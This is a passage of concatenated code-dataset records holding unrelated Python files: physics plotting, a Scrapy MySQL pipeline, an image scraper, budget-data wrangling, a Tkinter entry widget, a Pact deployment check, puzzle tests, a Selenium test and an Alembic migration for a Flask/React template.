frp.sources = zip(filenames, workspaces,\n [snapshot % (icat.name, lo, hi) for lo, hi in binedges])\n frp.getters = var_vs_pt('chi2Prob')\n frp.title = ', '.join(icat.labels)\n frp.getdata()\n frp.makegraph()\n\ncanvases.next('sreco_pvalues_vs_phoEt').SetLogy()\nfrp.plotall(logy = True, title = 's_{reco} Fits')\n\n## Make the distribution of the p-values\nhist = frp.histogramall(\n name = 'h_sreco_pvalues',\n title = 's_{reco} = E^{#gamma}_{reco}/E^{#gamma}_{kin};p-value;Fits',\n nbins = 5, xlow = 0, xhigh = 1\n )\nc1 = canvases.next('sreco_pvalues_distro')\nhist.Draw('e0')\nplotters.append(hist)\n\nc1.Update()\n\nif __name__ == '__main__':\n import user\n","sub_path":"MuMu/test/escale/frp_caltech_vs_lyon.py","file_name":"frp_caltech_vs_lyon.py","file_ext":"py","file_size_in_byte":9718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"442195433","text":"# -*- coding: utf-8 -*-\n\nfrom twisted.enterprise import adbapi\nimport MySQLdb.cursors\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\n'''\nCREATE TABLE `alpha_document_article` (\n `id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '文档ID',\n `parse` tinyint(3) unsigned NOT NULL DEFAULT '0' COMMENT '内容解析类型',\n `content` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_bin NOT NULL COMMENT '文章内容',\n `template` varchar(100) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin NOT NULL DEFAULT '' COMMENT '详情页显示模板',\n `bookmark` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '收藏数',\n `url` varchar(255) NOT NULL DEFAULT '' COMMENT '文章url',\n `md5` char(32) CHARACTER SET utf8 NOT NULL DEFAULT '' COMMENT '文章url md5',\n `title` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin NOT NULL DEFAULT '' COMMENT '文章标题',\n `summary` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL COMMENT '文章摘要',\n `img` varchar(255) DEFAULT NULL COMMENT '缩略图',\n `article_img` varchar(255) DEFAULT NULL COMMENT '大图',\n `article_img_from` varchar(255) DEFAULT NULL COMMENT '大图来源',\n `article_source` varchar(255) DEFAULT NULL COMMENT '文章来源',\n `article_source_link` varchar(255) DEFAULT NULL COMMENT '文章源link',\n `article_source_title` varchar(255) DEFAULT NULL COMMENT '文章源标题',\n `create_time` bigint(13) unsigned NOT NULL DEFAULT '0' COMMENT '创建时间',\n `update_time` bigint(13) unsigned NOT NULL DEFAULT '0' COMMENT '更新时间',\n `author` varchar(255) DEFAULT NULL COMMENT '作者',\n PRIMARY KEY (`id`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 ROW_FORMAT=DYNAMIC COMMENT='文档模型文章表';\n\n title = scrapy.Field()\n url = scrapy.Field()\n md5 = scrapy.Field()\n img = scrapy.Field()\n author = scrapy.Field()\n time = scrapy.Field()\n articleImg = scrapy.Field()\n articleImgFrom = scrapy.Field()\n articleSource = scrapy.Field()\n articleSourceLink = scrapy.Field()\n articleSourceTitle = scrapy.Field()\n summary = scrapy.Field()\n content = scrapy.Field()\n'''\n\nimport json\nimport datetime\n\nclass JsonWriterPipeline(object):\n\n def open_spider(self, spider):\n self.file = open('../result/%s.json' % (datetime.datetime.now().strftime('%b-%d-%y_%H_%M_%S')), 'w')\n self.file.write('[')\n self.firstLine = True\n\n def close_spider(self, spider):\n self.file.write(']')\n self.file.close()\n\n def process_item(self, item, spider):\n if self.firstLine:\n line = json.dumps(dict(item))\n self.firstLine = False\n else:\n line = \",\\n\" + json.dumps(dict(item))\n self.file.write(line)\n return item\n\nclass AlphaPipeline(object):\n def __init__(self): \n self.db_pool = adbapi.ConnectionPool('MySQLdb',\n db='alpha',\n user='root',\n passwd='123456',\n host='127.0.0.1',\n port=3307,\n charset='utf8',\n use_unicode=True)\n \n def process_item(self, item, spider):\n query = self.db_pool.runInteraction(self._conditional_insert, item)\n query.addErrback(self.handle_error)\n return item\n\n def _conditional_insert(self, tx, item):\n print(\"select id from alpha_document_article where md5 = %s\", (item['md5'], ))\n\n tx.execute(\"select id from alpha_document_article where md5 = %s\", (item['md5'], ))\n result = tx.fetchone()\n if result:\n pass\n else:\n values = (\n item['title'],\n item['url'],\n item['md5'],\n item['content'],\n item['author'],\n item['summary'],\n item['img'],\n item['articleImg'],\n item['articleImgFrom'],\n item['articleSource'],\n item['articleSourceLink'],\n item['articleSourceTitle'],\n item['time']\n )\n tx.execute(\"insert into alpha_document_article(title, url, md5, content, author, summary, img, article_img, article_img_from, article_source, article_source_link, article_source_title, create_time) values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)\", values)\n\n def handle_error(self, e):\n print('error',e)","sub_path":"spider/alpha/alpha/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":4695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"42848457","text":"from urllib.request import urlopen, urlretrieve\nfrom urllib.parse import urljoin\nfrom bs4 import BeautifulSoup\nimport os\n\n\nbaseUrl = \"https://apod.nasa.gov/apod/archivepix.html\"\narchiveHtmlStr = urlopen(baseUrl).read()\n\nfor link in BeautifulSoup(archiveHtmlStr, \"html.parser\").findAll(\"a\", limit=10):\n imgBaseUrl = urljoin(baseUrl, link['href'])\n \n # follow the link to image page\n imgHtmlStr = urlopen(imgBaseUrl).read()\n imgUrl = urljoin(imgBaseUrl, BeautifulSoup(imgHtmlStr, \"html.parser\").img['src'])\n imgName = imgUrl.split('/')[-1]\n print(imgName, imgUrl)\n\n # download and store image\n downloadDir = 'apod_pictures'\n urlretrieve(imgUrl, os.path.join(downloadDir, imgName))\n ","sub_path":"python/oreilly_intermediate_python/unit6_scraping/scraper3.py","file_name":"scraper3.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"419726646","text":"\"\"\"\nAuthor: Janelle Becker\nOriginal Date: 17-08-07\n\nGOALS OF THIS SCRIPT:\n --Read in historical MTS data table (outlays)\n --Get the data in a dataframe format that is ready for data visualization \n --Ideally tool-agnostic, but for now, assuming LONG dataset \n \n \n # Create separate dataframe of the following by splitting into 3 df's\n (1) numbers\n (2) percent of outlays\n (3) percent of gdp\n \n \n \n --v2 changes:\n\n\n\n\"\"\"\n### Import stuff --------------------------------------------------------------\nimport pandas as pd\nfrom datetime import datetime, timedelta\nimport time\nimport requests\nimport numpy as np\nimport json\nimport urllib\nfrom pandas.io.json import json_normalize\nimport os\nimport xlrd\n\nstart = time.time()\n\n\n### SET UP THE DIRECTORIES ----------------------------------------------------\nmain_dir = \"C:/Users/583902/Desktop/BAH1/_Treasury_DATA_Act/MTS\"\ndata_dir = main_dir + \"/data\"\nhist_dir = data_dir + \"/Historical_Tables/GPO_Historical_Tables\"\noutput_dir = data_dir + \"/output/historical_output\"\n\n\nos.chdir(hist_dir) #change working directory to data in GA folder\nos.listdir(os.getcwd()) #list out files in there \n\n\"\"\"|--------------------------------------------------------------------|\"\"\"\n\"\"\"| Random Technical Notes |\"\"\"\n\"\"\"|--------------------------------------------------------------------|\"\"\"\n\n\"\"\" \nFILE NAMES\nfor some reason these file names are off by one. Table 3.1 is \n#called 4-1 :(\n\n# Table 3.1—OUTLAYS BY SUPERFUNCTION AND FUNCTION: 1940–2021\n # numbers are in millions (from excel)\n # (*) * 0.05 percent or less.\n # (−*) i guess negative less than .05 percent?\n\nFISCAL YEAR \nThe first fiscal year for the U.S. Government started Jan. 1, 1789. Congress \nchanged the beginning of the fiscal year from Jan. 1 to Jul. 1 in 1842, and \nfinally from Jul. 1 to Oct. 1 in 1977 where it remains today.\n\n\n# Some functions started at different times, e.g. Medicare or General Science \n I converted these \"....\" to zeroes.\n\n\"\"\"\n\n\n\n\"\"\"|--------------------------------------------------------------------|\"\"\"\n\"\"\"| Bring in the data |\"\"\"\n\"\"\"|--------------------------------------------------------------------|\"\"\"\n\n\n# Table 3.1—OUTLAYS BY SUPERFUNCTION AND FUNCTION: 1940–2021\n\n# numbers are in millions (from excel)\n# (*) * 0.05 percent or less.\n# (−*) i guess negative less than .05 percent?\n\npath = hist_dir + \"/BUDGET-2017-TAB-4-1.xls\"\nwhatiwant = {col: str for col in (0,83)} #got 84 from excel...smart way to do this if data were huge???\ndf = pd.read_excel(path, \n sheetname=\"Table\", \n header=1,\n skiprows = [2, 57],\n converters=whatiwant)\n\n\"\"\"|--------------------------------------------------------------------|\"\"\"\n\"\"\"| Wrangle in the data |\"\"\"\n\"\"\"|--------------------------------------------------------------------|\"\"\"\n\n\n#Check out the column names \ncols_df = df.columns.tolist()\n\n\n#Rename columns ----------------------------------------------------------------\ncols_to_change = cols_df[1:]\ncols_new_names = [\"outlays_M_\" + str(i) for i in cols_to_change]\n\n# Add in the superfunction column name back to the list\ncols_new_names = ['Superfunction_and_Function'] + cols_new_names\n\nfor (oldcolname, replacement) in zip(cols_df, cols_new_names):\n df.rename(columns={oldcolname : replacement}, inplace=True)\n\n\n#Still have a few i want to rename and I don't feel like making new lists\ndf.rename(columns= {\"outlays_M_2016 estimate\" : \"outlays_M_2016_estimate\"}, inplace=True)\ndf.rename(columns= {\"outlays_M_2017 estimate\" : \"outlays_M_2017_estimate\"}, inplace=True)\ndf.rename(columns= {\"outlays_M_2018 estimate\" : \"outlays_M_2018_estimate\"}, inplace=True)\ndf.rename(columns= {\"outlays_M_2019 estimate\" : \"outlays_M_2019_estimate\"}, inplace=True)\ndf.rename(columns= {\"outlays_M_2020 estimate\" : \"outlays_M_2020_estimate\"}, inplace=True)\ndf.rename(columns= {\"outlays_M_2021 estimate\" : \"outlays_M_2021_estimate\"}, inplace=True)\n\n#check that it went right\ncols_df = df.columns.tolist() \ncols_df\n\n\"\"\"|--------------------------------------------------------------------|\"\"\"\n\"\"\"| Create 3 dataframes: $, % of outlays, % of GDP |\"\"\"\n\"\"\"|--------------------------------------------------------------------|\"\"\"\n# I want to create a separate dataframe for the \"As a percent of outlays\" numbers\n\n#Find the line that says \"As percentages of outlays:\" and its index\nindex_pct_OL_header = df[(df.loc[:, 'Superfunction_and_Function']==\"As percentages of outlays: \")].index.tolist()[0]\nindex_pct_GDP_header = df[(df.loc[:, 'Superfunction_and_Function']==\"As percentages of GDP: \")].index.tolist()[0]\n\n# Rows 0 to index_pct_OL_header is what I want\n# Rows index_pct_OL_header to index_pct_GDP_header is % of outlays\n# Rows index_pct_GDP_header to the end is % of GDP\n\ndf1 = df[:] #make a copy instead of renaming the actual dataframe\ndf = df1[:index_pct_OL_header]\ndf_pct_OL = df1[index_pct_OL_header:index_pct_GDP_header]\ndf_pct_GDP = df1[index_pct_GDP_header:]\n\n\n\"\"\"|--------------------------------------------------------------------|\"\"\"\n\"\"\"| Wrangle the data to get just functions & values |\"\"\"\n\"\"\"|--------------------------------------------------------------------|\"\"\"\n# I only want the FUNCTIONS, and there are a lot of other lines, e.g. on- and off-budget numbers\n\n### Drop row if it is offering on-budget or off-budget numbers -------------------\n\n# make sure it's a string and stripped/trimmed\ndf['Superfunction_and_Function'] = df['Superfunction_and_Function'].str.strip()\ndf['Superfunction_and_Function'] = df['Superfunction_and_Function'].astype(str)\n\n#Keep the rows where the function does not include the word \"budget\"\ndf = df[~df['Superfunction_and_Function'].str.contains('budget')]\ndf.reset_index(drop=True, inplace=True)\n\n\n### Find all \"..........\" and replace with NaN for the whole dataframe----------------\n#When no values are available (e.g. Medicare in 1950) they used \"..........\"\ndf = df.replace(\"..........\", 0)\n\n\n### Ensure all numbers are typed as floats or integers---------------------------\n# For some reason, the 2021 estimate column isn't a number?\ncols_df\ntype(df['outlays_M_2020_estimate'][0]) # numpy.float64\ntype(df['outlays_M_2021_estimate'][0]) # STR ??\n\n\ndf['outlays_M_2021_estimate'] = df['outlays_M_2021_estimate'].astype(float)\ntype(df['outlays_M_2021_estimate'][0]) # numpy.float64\n\n \n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"scripts/MTS_Historical_to_Viz_Outlays_v1.py","file_name":"MTS_Historical_to_Viz_Outlays_v1.py","file_ext":"py","file_size_in_byte":6628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"543156779","text":"import tkinter as tk\n\nfrom collections import namedtuple\nfrom tkinter import ttk\n\n \nclass ClipboardEntry(ttk.Entry):\n MAX_HISTORY = 30\n HISTORY_ENTRY = namedtuple('History', ('data', 'pre_index', 'post_index'))\n \n class DataChangedInfo:\n def __init__(self, pre=None, post=tk.END):\n self.pre_index = pre\n self.post_index = post\n \n def reset(self):\n self.pre_index = None\n self.post_index = tk.END\n \n def str(self):\n return str(self.pre_index) + ', ' + str(self.post_index)\n \n def repr(self):\n pre, post = tuple(map(repr, (self.pre_index, self.post_index)))\n return f'DataChangedInfo({pre}, {post})'\n \n def __init__(self, parent, max_length=None, **kwargs):\n self.data_var = kwargs.pop('textvariable', tk.StringVar())\n self.max_length = 128\n self.data_changed_info = ClipboardEntry.DataChangedInfo()\n super().__init__(parent, textvariable=self.data_var, **kwargs)\n \n self.history = [ClipboardEntry.HISTORY_ENTRY(self.data_var.get(), None, self.index(tk.INSERT))]\n self.redo_stack = []\n \n self.context_menu = self.create_menu()\n self.bind(\"\", self._show_context_menu)\n self.bind(\"\", self.undo)\n self.bind(\"\", self.redo)\n self.bind(\"\", self._on_key_pressed)\n self.data_var.trace('w', self._on_data_changed)\n self.focus = self.focus_set\n \n def create_menu(self):\n menu = tk.Menu(self, tearoff=False)\n menu.add_command(label=\"Cut\")\n menu.add_command(label=\"Copy\")\n menu.add_command(label=\"Paste\")\n return menu\n \n def clear_history(self):\n self.history.clear()\n self.redo_stack.clear()\n self.history.append(ClipboardEntry.HISTORY_ENTRY(self.data_var.get(), None, self.index(tk.INSERT)))\n \n def insert(self, index, string):\n idx = index if index != tk.INSERT else self.index()\n self.data_changed_info.pre_index = idx\n self.data_changed_info.post_index = idx + len(string)\n super().insert(index, string)\n \n def delete(self, first, last=None):\n def fix_index(idx):\n if idx == tk.INSERT:\n return self.index()\n elif idx == tk.END:\n return len(self.data_var.get())\n return idx\n fst, lst = tuple(map(fix_index, (first, last)))\n length = lst - fst if lst is not None else 1\n self.data_changed_info.pre_index = fst + length\n self.data_changed_info.post_index = fst\n super().delete(first, last)\n \n def focus_set(self):\n self.icursor(self.history[-1].post_index)\n super().focus()\n \n def undo(self, event=None):\n if len(self.history) > 1:\n pre_index = self.history[-1].pre_index\n self.redo_stack.append(self.history.pop())\n self.data_var.set(self.history[-1].data)\n if pre_index is not None:\n self.icursor(pre_index)\n \n def redo(self, event=None):\n if self.redo_stack:\n self.history.append(self.redo_stack.pop())\n self.data_var.set(self.history[-1].data)\n self.icursor(self.history[-1].post_index)\n\n def _on_key_pressed(self, event=None):\n # guaranteed to happen before data_var trace callback (_on_data_changed)\n length_difference = len(self.data_var.get()) - len(self.history[-1].data)\n self.data_changed_info.pre_index = self.index(tk.INSERT) - length_difference\n self.data_changed_info.post_index = self.index(tk.INSERT)\n \n def _on_data_changed(self, *args):\n data = self.data_var.get()\n if data != self.history[-1].data:\n if self.max_length is None or len(data) <= self.max_length:\n hist_entry = ClipboardEntry.HISTORY_ENTRY(self.data_var.get(), self.data_changed_info.pre_index, self.data_changed_info.post_index)\n self.history.append(hist_entry)\n self.redo_stack.clear()\n if len(self.history) > ClipboardEntry.MAX_HISTORY + 1:\n self.history.pop(0)\n else:\n self.data_var.set(self.history[-1].data)\n if self.data_changed_info.pre_index is not None:\n self.icursor(self.data_changed_info.pre_index)\n self.data_changed_info.reset()\n \n def _show_context_menu(self, event):\n self.context_menu.entryconfigure(\"Cut\", command=lambda: self.event_generate(\"<>\"))\n self.context_menu.entryconfigure(\"Copy\", command=lambda: self.event_generate(\"<>\"))\n self.context_menu.entryconfigure(\"Paste\", command=lambda: self.event_generate(\"<>\"))\n self.context_menu.post(event.x_root, event.y_root)","sub_path":"ui/entry.py","file_name":"entry.py","file_ext":"py","file_size_in_byte":4893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"123798145","text":"import boto3\nimport subprocess\nimport re\nimport os\nimport argparse\nfrom boto3 import Session\nfrom boto3 import exceptions\n\n\nclass PactDeploymentCheck:\n def __init__(\n self,\n pact_broker_url,\n broker_user_name,\n broker_secret_name,\n consumer_pacticipant,\n provider_pacticipant,\n consumer_api_version,\n git_commit,\n ):\n\n self.pact_broker_url = pact_broker_url\n self.broker_user_name = broker_user_name\n self.broker_secret_name = broker_secret_name\n self.consumer_pacticipant = consumer_pacticipant\n self.provider_pacticipant = provider_pacticipant\n self.consumer_api_version = consumer_api_version\n self.git_commit = git_commit\n self.broker_password = self.get_secret()\n\n current_folder = os.path.basename(os.path.normpath(os.getcwd()))\n if \"CI\" in os.environ:\n if current_folder == \"test\":\n self.pact_path_prefix = \"../../\"\n else:\n self.pact_path_prefix = \"../\"\n else:\n if current_folder == \"test\":\n self.pact_path_prefix = \"../../../\"\n else:\n self.pact_path_prefix = \"../../\"\n\n def can_i_deploy(self):\n # CanIDeploy with consumer git_commit and latest provider tagged with v_production (must get version from tags)\n command = '''{pact_path_prefix}pact/bin/pact-broker can-i-deploy \\\\\n --broker-base-url=\\\"{pact_broker_url}\\\" \\\\\n --broker-username=\\\"{broker_user_name}\\\" \\\\\n --broker-password=\\\"{broker_password}\\\" \\\\\n --pacticipant=\\\"{consumer_pacticipant}\\\" \\\\\n --version \\\"{git_commit_consumer}\\\" \\\\\n --pacticipant \\\"{provider_pacticipant}\\\" \\\\\n --latest \\\"{latest}\\\"'''.format(\n pact_broker_url=self.pact_broker_url,\n broker_user_name=self.broker_user_name,\n broker_password=self.broker_password,\n consumer_pacticipant=self.consumer_pacticipant,\n provider_pacticipant=self.provider_pacticipant,\n latest=f\"{self.consumer_api_version}_production\",\n git_commit_consumer=self.git_commit,\n pact_path_prefix=self.pact_path_prefix,\n )\n\n #\n command_response = subprocess.Popen(\n command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT\n )\n\n fail_build = True\n for line in command_response.stdout.readlines():\n if \"Computer says yes\" in str(line):\n fail_build = False\n pass\n\n ansi_escape_8bit = re.compile(\n br\"(?:\\x1B[@-Z\\\\-_]|[\\x80-\\x9A\\x9C-\\x9F]|(?:\\x1B\\[|\\x9B)[0-?]*[ -/]*[@-~])\"\n )\n last_line = ansi_escape_8bit.sub(b\"\", line)\n print(last_line)\n\n return fail_build\n\n def get_secret(self):\n \"\"\"\n Gets the secret for PACT broker\n \"\"\"\n\n if self.broker_secret_name == \"local\":\n return \"dummy_password\"\n\n region_name = \"eu-west-1\"\n\n client = boto3.client(\"sts\")\n account_id = client.get_caller_identity()[\"Account\"]\n print(f\"Current users account: {account_id}\")\n\n role_to_assume = \"arn:aws:iam::997462338508:role/get-pact-secret-production\"\n response = client.assume_role(\n RoleArn=role_to_assume, RoleSessionName=\"assumed_role\"\n )\n\n session = Session(\n aws_access_key_id=response[\"Credentials\"][\"AccessKeyId\"],\n aws_secret_access_key=response[\"Credentials\"][\"SecretAccessKey\"],\n aws_session_token=response[\"Credentials\"][\"SessionToken\"],\n )\n\n client = session.client(service_name=\"secretsmanager\", region_name=region_name)\n\n try:\n get_secret_value_response = client.get_secret_value(\n SecretId=self.broker_secret_name\n )\n secret = get_secret_value_response[\"SecretString\"]\n except exceptions.ClientError as e:\n print(\"Unable to get secret from Secrets Manager\")\n raise e\n\n return secret\n\n\ndef main():\n parser = argparse.ArgumentParser(\n description=\"Check if we can continue our CI pipeline.\"\n )\n parser.add_argument(\n \"--pact_broker_url\",\n default=\"https://pact-broker.api.opg.service.justice.gov.uk\",\n help=\"Base URL for the pact broker.\",\n )\n parser.add_argument(\n \"--broker_user_name\",\n default=\"admin\",\n help=\"The user to log in to pact broker with.\",\n )\n parser.add_argument(\n \"--broker_secret_name\",\n default=\"pactbroker_admin\",\n help=\"Name of the secret to use to get the password.\",\n )\n parser.add_argument(\n \"--consumer_pacticipant\",\n default=\"Complete the deputy report\",\n help=\"Name of the consumer of the API.\",\n )\n parser.add_argument(\n \"--provider_pacticipant\",\n default=\"OPG Data\",\n help=\"Name of the provider of the API.\",\n )\n parser.add_argument(\n \"--consumer_api_version\",\n default=\"v1\",\n help=\"Name of consumer version to check.\",\n )\n parser.add_argument(\n \"--git_commit\",\n default=\"d31b90b\",\n help=\"Reference for the consumer git commit version.\",\n )\n\n args = parser.parse_args()\n\n deployment_check = PactDeploymentCheck(\n args.pact_broker_url,\n args.broker_user_name,\n args.broker_secret_name,\n args.consumer_pacticipant,\n args.provider_pacticipant,\n args.consumer_api_version,\n args.git_commit,\n )\n\n print(deployment_check.can_i_deploy())\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"shared_code/pact/opg_pact/consumer_pact_check.py","file_name":"consumer_pact_check.py","file_ext":"py","file_size_in_byte":5685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"257792458","text":"#!/usr/bin/env python\n\nimport unittest\nfrom day07 import has_abba, get_abba_allowed_strings, get_abba_disallowed_strings\nfrom day07 import supports_tls, count_tls_addresses\nfrom day07 import find_abas, supports_ssl, count_ssl_addresses\n\n\nclass TestFindingABBASequences(unittest.TestCase):\n cases = (\n ('abba', True),\n ('oxyyxo', True),\n ('aaaa', False),\n ('abcd', False),\n )\n\n def test_finds_abba_sequences(self):\n for text, expected in self.cases:\n self.assertEqual(has_abba(text), expected)\n\n\nclass TestGettingAllowedChunks(unittest.TestCase):\n cases = (\n ('abba[mnop]qrst[abcd]defg', ['abba', 'qrst', 'defg']),\n )\n\n def test_finds_allowed_substrings(self):\n for text, expected in self.cases:\n self.assertEqual(get_abba_allowed_strings(text), expected)\n\n\nclass TestGettingDisallowedChunks(unittest.TestCase):\n cases = (\n ('abba[mnop]qrst[abcd]defg', ['mnop', 'abcd']),\n )\n\n def test_finds_disallowed_substrings(self):\n for text, expected in self.cases:\n self.assertEqual(get_abba_disallowed_strings(text), expected)\n\n\nclass TestCheckingTLSAddresses(unittest.TestCase):\n cases = (\n ('abba[mnop]qrst', True),\n ('abcd[bddb]xyyx', False),\n ('aaaa[qwer]tyui', False),\n ('ioxxoj[asdfgh]zxcvbn', True),\n )\n\n def test_finds_tls_addresses(self):\n for text, expected in self.cases:\n self.assertEqual(supports_tls(text), expected)\n\n def test_counts_tls_addresses(self):\n data = [x[0] for x in self.cases]\n self.assertEqual(count_tls_addresses(data), 2)\n\n\nclass TestFindingABASequences(unittest.TestCase):\n cases = (\n ('aba', ['aba']),\n ('xyxxyx', ['xyx']),\n ('aaakekeke', ['eke', 'kek']),\n ('zazbzbzbcdb', ['bzb', 'zaz', 'zbz']),\n )\n\n def test_finds_aba_sequences(self):\n for text, expected in self.cases:\n self.assertEqual(find_abas(text), expected)\n\n\nclass TestCheckingSSLAddresses(unittest.TestCase):\n cases = (\n ('aba[bab]xyz', True),\n ('xyx[xyx]xyx', False),\n ('aaa[kek]eke', True),\n ('zazbz[bzb]cdb', True),\n )\n\n def test_finds_ssl_addresses(self):\n for text, expected in self.cases:\n self.assertEqual(supports_ssl(text), expected)\n\n def test_counts_ssl_addresses(self):\n data = [x[0] for x in self.cases]\n self.assertEqual(count_ssl_addresses(data), 3)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"day07/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"217459282","text":"from selenium import selenium\n\n# version: 2.001\nimport unittest, time, re\n\nclass gsmarena_samsung(unittest.TestCase):\n def setUp(self):\n self.verificationErrors = []\n self.selenium = selenium(\"localhost\", 4444, \"*firefox\", \"http://www.gsmarena.com/\")\n self.selenium.start()\n \n def test_gsmarena_samsung(self):\n sel = self.selenium\n sel.open(\"/\")\n sel.click(\"link=Phone Finder\")\n sel.wait_for_page_to_load(\"30000\")\n sel.select(\"name=idMaker\", \"label=Samsung\")\n sel.click(\"name=chkHSDPA2100\")\n sel.select(\"name=TalkTime\", \"label=More than 10 hours\")\n sel.click(\"css=input.st-button\")\n sel.wait_for_page_to_load(\"30000\")\n \n def tearDown(self):\n self.selenium.stop()\n self.assertEqual([], self.verificationErrors)\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"demo/testsuite-selenium/gsmarena_samsung.py","file_name":"gsmarena_samsung.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"72505456","text":"import os\n# get images names in test folder to use them in cmd param\n\ndir_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'in')\n\ncmdParams =\"\"\nfor root, dirs, filenames in os.walk(dir_path):\n for f in filenames:\n cmdParams += os.path.join(root, f) + \" \"\n\t\t\nwith open(\"t.txt\", 'w') as f:\n\tf.write(cmdParams)\n\n\t\t\n","sub_path":"msc/ImageThumbnailBatch/getImagesNamesFromTestFolder.py","file_name":"getImagesNamesFromTestFolder.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"415774405","text":"\"\"\"posts table\n\nRevision ID: a5b9000f295e\nRevises: e32dd245038a\nCreate Date: 2020-09-28 19:49:40.126045\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'a5b9000f295e'\ndown_revision = 'e32dd245038a'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n posts = op.create_table('post',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('title', sa.String(length=140), nullable=True),\n sa.Column('body', sa.String(length=1400), nullable=True),\n sa.Column('timestamp', sa.DateTime(), nullable=True),\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['user_id'], ['userr.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_post_timestamp'), 'post', ['timestamp'], unique=False)\n # ### end Alembic commands ###\n\n op.bulk_insert(posts,\n [\n {\n 'id': 1,\n 'title': 'intro',\n 'body': '## intro\\n\\nthis is web service application template that uses following stack:\\n * **Python (flask)**\\n* **ReacJS** (functional components)\\n'\n '* **Redux** and **react-redux**\\n* **PostgreSQL**\\n* **Docker** and **docker-compose**\\n* **GitlabCI**\\n\\n'\n 'Main idea of that template is using it as starting point for rapid development web services.\\n'\n 'Implements basic authorization/authentication functionality using `JWT tokens`.\\n',\n 'user_id': 1\n },\n {\n 'id': 2,\n 'title': 'backend',\n 'body': '## backend\\n\\nis based on **Flask** framework. Gives highest level of flexibility on choosing tools and technologies for '\n 'web applications development.\\n\\n Used extensions:\\n* **flask-sqlalchemy**\\n* **flask-migrate**\\n* **flask_restful**\\n* **flask_jwt_extended**\\n\\n'\n 'authentication implemented using `JWT tokens`. All authorization/authentication related information stored in database\\n\\n'\n 'default user `guest/guest1` implemented to lauhch it out of box.',\n 'user_id': 1\n },\n {\n 'id': 3,\n 'title': 'frontend',\n 'body': '## frontend\\n\\ndeveloped using ReactJS. Used just as the most popular framework that gives ability to develop flexible '\n 'SPA in short time.\\n\\n'\n 'Build system:\\n* **npm**\\n* **webpack**\\n* **babel**\\n\\n'\n 'used components library:\\n* **material-ui**\\n\\n'\n 'served on backend as static prebuilt single `index.html` file.\\n\\n'\n 'used technologies:\\n* **redux** and **react-redux** to store state of all components at single place\\n'\n '* **route** to implement Front side URL navigation\\n'\n '* **local storage** to store JWT tokens.\\n'\n '* **redux-logger** for development purposes',\n 'user_id': 1\n },\n {\n 'id': 4,\n 'title': 'database',\n 'body': '## database\\n\\n**Postgresql** used as main SQL database to store data. '\n 'There was no serious reason to use exactly PostgreSQL. This is just what used historically. '\n 'Database migration (`flask db`) implemented to simplify deploy and future schema updating processes.\\n\\n'\n '#### DB schema:\\n- table `alembic_version` with following fields:\\n - version_num\\n- table `userr` with '\n 'following fields:\\n - id\\n - username\\n - email\\n - password_hash\\n- table `post` with following fields:\\n - id\\n'\n ' - title\\n - body\\n - timestamp\\n - user_id\\n'\n '- table `revoked_tokens` with following fields:\\n - id\\n - jti\\n',\n 'user_id': 1\n },\n {\n 'id': 5,\n 'title': 'devops',\n 'body': '## devops\\n\\n**docker** and **docker-compose** used for containerization.`Dockerfile` and `docker-compose.yml` '\n 'can be found in root folder of project\\n',\n 'user_id': 1\n },\n {\n 'id': 6,\n 'title': 'ci/cd',\n 'body': '## ci/cd\\n\\ndeploy automatization using `gitlab runners` implemented. `.gitlab-ci.yml` file can be found in root folder of project.',\n 'user_id': 1\n },\n {\n 'id': 7,\n 'title': 'project structure',\n 'body': '## project structure\\n\\n- **application.py** is entrypoint for flask backend. All backend related sources placed in **/app** folder.\\n'\n '- **/migrations** - folder used by `flask db` to migrate database. In a case of any future database changes '\n 'dont forget to make related changes using `flask db migrate` to register changes in db.'\n 'try to divide changes in db to small logically separated chunks like you do it on merge requests using git.\\n'\n '- **/ui** - contains ReactJS based Frontend UI project.\\n'\n '- **/static_** - contains prebuilt frontend SPA page generated using `make ui-build` command. '\n 'Not necessary to put it under git control. Did it just for quick launching 